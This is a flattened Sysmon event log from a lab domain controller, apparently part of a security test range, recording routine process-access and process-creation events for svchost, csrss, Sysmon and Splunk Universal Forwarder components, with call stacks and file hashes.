15:56:11.848{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006782Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006781Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006780Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006779Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006778Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006777Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7D9B-5FA1-7901-000000008801}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006776Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.848{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D9B-5FA1-7901-000000008801}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006775Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.849{D28789B6-7D9B-5FA1-7901-000000008801}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006774Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D9B-5FA1-7801-000000008801}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006773Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006772Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006771Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006770Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006769Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006768Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006767Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006766Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006765Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006764Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7D9B-5FA1-7801-000000008801}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006763Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.176{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D9B-5FA1-7801-000000008801}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006762Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:11.177{D28789B6-7D9B-5FA1-7801-000000008801}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006801Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D9C-5FA1-7A01-000000008801}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006800Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006799Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006798Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006797Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 